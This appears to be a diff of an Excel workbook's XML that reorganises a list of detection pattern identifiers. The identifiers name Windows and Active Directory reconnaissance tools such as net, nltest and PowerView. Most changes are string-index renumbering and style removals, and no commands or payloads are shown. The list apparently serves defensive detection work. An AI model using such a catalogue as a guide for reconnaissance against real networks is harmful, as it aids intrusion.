   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1132" uniqueCount="441">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1132" uniqueCount="439">
   <si>
     <t>Pattern</t>
   </si>
@@ -1356,16 +1356,6 @@
     <t>NET_XXXX</t>
   </si>
   <si>
-    <t>NLTEST_P1001</t>
-  </si>
-  <si>
-    <t>NLTEST_P1001
-NLTEST_P1000</t>
-  </si>
-  <si>
-    <t>NLTEST_P1000</t>
-  </si>
-  <si>
     <t>POWERVIEW</t>
   </si>
   <si>
@@ -1470,13 +1460,16 @@
     <t>NET_P1001
 NET_P1002
 NET_P1004</t>
+  </si>
+  <si>
+    <t>NLTEST</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="4">
+  <fonts count="3">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -1495,26 +1488,13 @@
       <color rgb="FF000000"/>
       <name val="Inter"/>
     </font>
-    <font>
-      <sz val="12"/>
-      <color rgb="FF000000"/>
-      <name val="Calibri"/>
-      <family val="2"/>
-      <scheme val="minor"/>
-    </font>
   </fonts>
-  <fills count="3">
+  <fills count="2">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
-    </fill>
-    <fill>
-      <patternFill patternType="solid">
-        <fgColor rgb="FFD9D9D9"/>
-        <bgColor rgb="FFD9D9D9"/>
-      </patternFill>
     </fill>
   </fills>
   <borders count="2">
@@ -1544,14 +1524,13 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="5">
+  <cellXfs count="4">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1893,8 +1872,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A183" workbookViewId="0">
-      <selection activeCell="B244" sqref="B244"/>
+    <sheetView tabSelected="1" topLeftCell="A43" workbookViewId="0">
+      <selection activeCell="B131" sqref="B131"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -2437,11 +2416,11 @@
         <v>101</v>
       </c>
       <c r="B34" s="1" t="s">
-        <v>430</v>
+        <v>427</v>
       </c>
       <c r="C34" s="1"/>
       <c r="F34" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="35" spans="1:6" ht="17">
@@ -2449,11 +2428,11 @@
         <v>101</v>
       </c>
       <c r="B35" s="1" t="s">
-        <v>431</v>
+        <v>428</v>
       </c>
       <c r="C35" s="1"/>
       <c r="F35" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="36" spans="1:6" ht="34">
@@ -2461,11 +2440,11 @@
         <v>101</v>
       </c>
       <c r="B36" s="1" t="s">
-        <v>415</v>
+        <v>412</v>
       </c>
       <c r="C36" s="1"/>
       <c r="F36" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="37" spans="1:6" ht="34">
@@ -2473,11 +2452,11 @@
         <v>101</v>
       </c>
       <c r="B37" s="1" t="s">
-        <v>416</v>
+        <v>413</v>
       </c>
       <c r="C37" s="1"/>
       <c r="F37" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="38" spans="1:6" ht="34">
@@ -2485,11 +2464,11 @@
         <v>101</v>
       </c>
       <c r="B38" s="1" t="s">
-        <v>432</v>
+        <v>429</v>
       </c>
       <c r="C38" s="1"/>
       <c r="F38" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="39" spans="1:6" ht="34">
@@ -2497,11 +2476,11 @@
         <v>101</v>
       </c>
       <c r="B39" s="1" t="s">
-        <v>417</v>
+        <v>414</v>
       </c>
       <c r="C39" s="1"/>
       <c r="F39" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="40" spans="1:6" ht="34">
@@ -2509,11 +2488,11 @@
         <v>101</v>
       </c>
       <c r="B40" s="1" t="s">
-        <v>418</v>
+        <v>415</v>
       </c>
       <c r="C40" s="1"/>
       <c r="F40" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="41" spans="1:6" ht="51">
@@ -2521,11 +2500,11 @@
         <v>101</v>
       </c>
       <c r="B41" s="1" t="s">
-        <v>419</v>
+        <v>416</v>
       </c>
       <c r="C41" s="1"/>
       <c r="F41" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="42" spans="1:6" ht="34">
@@ -2533,11 +2512,11 @@
         <v>101</v>
       </c>
       <c r="B42" s="1" t="s">
-        <v>420</v>
+        <v>417</v>
       </c>
       <c r="C42" s="1"/>
       <c r="F42" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="43" spans="1:6" ht="51">
@@ -2545,11 +2524,11 @@
         <v>101</v>
       </c>
       <c r="B43" s="1" t="s">
-        <v>421</v>
+        <v>418</v>
       </c>
       <c r="C43" s="1"/>
       <c r="F43" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="44" spans="1:6" ht="17">
@@ -2557,11 +2536,11 @@
         <v>101</v>
       </c>
       <c r="B44" s="1" t="s">
-        <v>422</v>
+        <v>419</v>
       </c>
       <c r="C44" s="1"/>
       <c r="F44" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="45" spans="1:6" ht="34">
@@ -2569,11 +2548,11 @@
         <v>101</v>
       </c>
       <c r="B45" s="1" t="s">
-        <v>433</v>
+        <v>430</v>
       </c>
       <c r="C45" s="1"/>
       <c r="F45" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="46" spans="1:6" ht="34">
@@ -2581,11 +2560,11 @@
         <v>101</v>
       </c>
       <c r="B46" s="1" t="s">
-        <v>423</v>
+        <v>420</v>
       </c>
       <c r="C46" s="1"/>
       <c r="F46" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="47" spans="1:6" ht="34">
@@ -2593,11 +2572,11 @@
         <v>101</v>
       </c>
       <c r="B47" s="1" t="s">
-        <v>424</v>
+        <v>421</v>
       </c>
       <c r="C47" s="1"/>
       <c r="F47" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="48" spans="1:6" ht="34">
@@ -2605,11 +2584,11 @@
         <v>101</v>
       </c>
       <c r="B48" s="1" t="s">
-        <v>425</v>
+        <v>422</v>
       </c>
       <c r="C48" s="1"/>
       <c r="F48" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="49" spans="1:6" ht="34">
@@ -2617,11 +2596,11 @@
         <v>101</v>
       </c>
       <c r="B49" s="1" t="s">
-        <v>426</v>
+        <v>423</v>
       </c>
       <c r="C49" s="1"/>
       <c r="F49" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="50" spans="1:6" ht="34">
@@ -2629,11 +2608,11 @@
         <v>101</v>
       </c>
       <c r="B50" s="1" t="s">
-        <v>427</v>
+        <v>424</v>
       </c>
       <c r="C50" s="1"/>
       <c r="F50" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="51" spans="1:6" ht="34">
@@ -2641,11 +2620,11 @@
         <v>101</v>
       </c>
       <c r="B51" s="1" t="s">
-        <v>434</v>
+        <v>431</v>
       </c>
       <c r="C51" s="1"/>
       <c r="F51" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="52" spans="1:6" ht="17">
@@ -2653,11 +2632,11 @@
         <v>101</v>
       </c>
       <c r="B52" s="1" t="s">
-        <v>435</v>
+        <v>432</v>
       </c>
       <c r="C52" s="1"/>
       <c r="F52" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="53" spans="1:6" ht="34">
@@ -2665,11 +2644,11 @@
         <v>101</v>
       </c>
       <c r="B53" s="1" t="s">
-        <v>428</v>
+        <v>425</v>
       </c>
       <c r="C53" s="1"/>
       <c r="F53" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="54" spans="1:6" ht="34">
@@ -2677,11 +2656,11 @@
         <v>101</v>
       </c>
       <c r="B54" s="1" t="s">
-        <v>429</v>
+        <v>426</v>
       </c>
       <c r="C54" s="1"/>
       <c r="F54" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="55" spans="1:6" ht="17">
@@ -2689,11 +2668,11 @@
         <v>101</v>
       </c>
       <c r="B55" s="1" t="s">
-        <v>436</v>
+        <v>433</v>
       </c>
       <c r="C55" s="1"/>
       <c r="F55" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="56" spans="1:6" ht="17">
@@ -2701,11 +2680,11 @@
         <v>101</v>
       </c>
       <c r="B56" s="1" t="s">
-        <v>437</v>
+        <v>434</v>
       </c>
       <c r="C56" s="1"/>
       <c r="F56" t="s">
-        <v>438</v>
+        <v>435</v>
       </c>
     </row>
     <row r="57" spans="1:6" ht="17">
@@ -3060,7 +3039,7 @@
     </row>
     <row r="79" spans="1:6" ht="68">
       <c r="A79" t="s">
-        <v>439</v>
+        <v>436</v>
       </c>
       <c r="B79" s="1" t="s">
         <v>352</v>
@@ -3288,7 +3267,7 @@
     </row>
     <row r="93" spans="1:6" ht="51">
       <c r="A93" s="1" t="s">
-        <v>440</v>
+        <v>437</v>
       </c>
       <c r="B93" s="1" t="s">
         <v>364</v>
@@ -3570,7 +3549,7 @@
     </row>
     <row r="111" spans="1:6" ht="17">
       <c r="A111" s="3" t="s">
-        <v>414</v>
+        <v>411</v>
       </c>
       <c r="B111" s="1" t="s">
         <v>378</v>
@@ -3585,7 +3564,7 @@
     </row>
     <row r="112" spans="1:6" ht="34">
       <c r="A112" t="s">
-        <v>409</v>
+        <v>406</v>
       </c>
       <c r="B112" s="1" t="s">
         <v>174</v>
@@ -3602,7 +3581,7 @@
     </row>
     <row r="113" spans="1:6" ht="17">
       <c r="A113" t="s">
-        <v>411</v>
+        <v>408</v>
       </c>
       <c r="B113" s="1" t="s">
         <v>237</v>
@@ -3619,7 +3598,7 @@
     </row>
     <row r="114" spans="1:6" ht="17">
       <c r="A114" t="s">
-        <v>411</v>
+        <v>408</v>
       </c>
       <c r="B114" s="1" t="s">
         <v>256</v>
@@ -3636,7 +3615,7 @@
     </row>
     <row r="115" spans="1:6" ht="17">
       <c r="A115" t="s">
-        <v>411</v>
+        <v>408</v>
       </c>
       <c r="B115" s="1" t="s">
         <v>289</v>
@@ -3651,7 +3630,7 @@
     </row>
     <row r="116" spans="1:6" ht="17">
       <c r="A116" t="s">
-        <v>411</v>
+        <v>408</v>
       </c>
       <c r="B116" s="1" t="s">
         <v>293</v>
@@ -3666,7 +3645,7 @@
     </row>
     <row r="117" spans="1:6" ht="17">
       <c r="A117" t="s">
-        <v>412</v>
+        <v>409</v>
       </c>
       <c r="B117" s="1" t="s">
         <v>238</v>
@@ -3683,7 +3662,7 @@
     </row>
     <row r="118" spans="1:6" ht="17">
       <c r="A118" t="s">
-        <v>412</v>
+        <v>409</v>
       </c>
       <c r="B118" s="1" t="s">
         <v>255</v>
@@ -3700,7 +3679,7 @@
     </row>
     <row r="119" spans="1:6" ht="17">
       <c r="A119" t="s">
-        <v>412</v>
+        <v>409</v>
       </c>
       <c r="B119" s="1" t="s">
         <v>288</v>
@@ -3715,7 +3694,7 @@
     </row>
     <row r="120" spans="1:6" ht="17">
       <c r="A120" t="s">
-        <v>412</v>
+        <v>409</v>
       </c>
       <c r="B120" s="1" t="s">
         <v>294</v>
@@ -3730,7 +3709,7 @@
     </row>
     <row r="121" spans="1:6" ht="34">
       <c r="A121" t="s">
-        <v>410</v>
+        <v>407</v>
       </c>
       <c r="B121" s="1" t="s">
         <v>116</v>
@@ -3747,7 +3726,7 @@
     </row>
     <row r="122" spans="1:6" ht="17">
       <c r="A122" t="s">
-        <v>410</v>
+        <v>407</v>
       </c>
       <c r="B122" s="1" t="s">
         <v>171</v>
@@ -3764,7 +3743,7 @@
     </row>
     <row r="123" spans="1:6" ht="17">
       <c r="A123" s="1" t="s">
-        <v>410</v>
+        <v>407</v>
       </c>
       <c r="B123" s="1" t="s">
         <v>236</v>
@@ -3781,7 +3760,7 @@
     </row>
     <row r="124" spans="1:6" ht="51">
       <c r="A124" s="1" t="s">
-        <v>413</v>
+        <v>410</v>
       </c>
       <c r="B124" s="1" t="s">
         <v>350</v>
@@ -3841,7 +3820,7 @@
     </row>
     <row r="128" spans="1:6" ht="17">
       <c r="A128" t="s">
-        <v>406</v>
+        <v>438</v>
       </c>
       <c r="B128" s="1" t="s">
         <v>63</v>
@@ -3858,7 +3837,7 @@
     </row>
     <row r="129" spans="1:6" ht="17">
       <c r="A129" t="s">
-        <v>406</v>
+        <v>438</v>
       </c>
       <c r="B129" s="1" t="s">
         <v>176</v>
@@ -3875,7 +3854,7 @@
     </row>
     <row r="130" spans="1:6" ht="17">
       <c r="A130" t="s">
-        <v>406</v>
+        <v>438</v>
       </c>
       <c r="B130" s="1" t="s">
         <v>191</v>
@@ -3892,7 +3871,7 @@
     </row>
     <row r="131" spans="1:6" ht="17">
       <c r="A131" t="s">
-        <v>406</v>
+        <v>438</v>
       </c>
       <c r="B131" s="1" t="s">
         <v>360</v>
@@ -3906,8 +3885,8 @@
       </c>
     </row>
     <row r="132" spans="1:6" ht="17">
-      <c r="A132" s="4" t="s">
-        <v>404</v>
+      <c r="A132" t="s">
+        <v>438</v>
       </c>
       <c r="B132" s="1" t="s">
         <v>178</v>
@@ -3924,7 +3903,7 @@
     </row>
     <row r="133" spans="1:6" ht="17">
       <c r="A133" t="s">
-        <v>404</v>
+        <v>438</v>
       </c>
       <c r="B133" s="1" t="s">
         <v>192</v>
@@ -3940,8 +3919,8 @@
       </c>
     </row>
     <row r="134" spans="1:6" ht="17">
-      <c r="A134" s="4" t="s">
-        <v>404</v>
+      <c r="A134" t="s">
+        <v>438</v>
       </c>
       <c r="B134" s="1" t="s">
         <v>322</v>
@@ -3956,7 +3935,7 @@
     </row>
     <row r="135" spans="1:6" ht="17">
       <c r="A135" t="s">
-        <v>404</v>
+        <v>438</v>
       </c>
       <c r="B135" s="1" t="s">
         <v>322</v>
@@ -3971,7 +3950,7 @@
     </row>
     <row r="136" spans="1:6" ht="17">
       <c r="A136" t="s">
-        <v>404</v>
+        <v>438</v>
       </c>
       <c r="B136" s="1" t="s">
         <v>322</v>
@@ -3985,8 +3964,8 @@
       </c>
     </row>
     <row r="137" spans="1:6" ht="51">
-      <c r="A137" s="1" t="s">
-        <v>405</v>
+      <c r="A137" t="s">
+        <v>438</v>
       </c>
       <c r="B137" s="1" t="s">
         <v>303</v>
@@ -4000,8 +3979,8 @@
       </c>
     </row>
     <row r="138" spans="1:6" ht="34">
-      <c r="A138" s="1" t="s">
-        <v>405</v>
+      <c r="A138" t="s">
+        <v>438</v>
       </c>
       <c r="B138" s="1" t="s">
         <v>331</v>
@@ -4048,7 +4027,7 @@
     </row>
     <row r="141" spans="1:6" ht="17">
       <c r="A141" t="s">
-        <v>407</v>
+        <v>404</v>
       </c>
       <c r="B141" s="1" t="s">
         <v>317</v>
@@ -5227,7 +5206,7 @@
     </row>
     <row r="216" spans="1:6" ht="17">
       <c r="A216" t="s">
-        <v>408</v>
+        <v>405</v>
       </c>
       <c r="B216" s="1" t="s">
         <v>203</v>
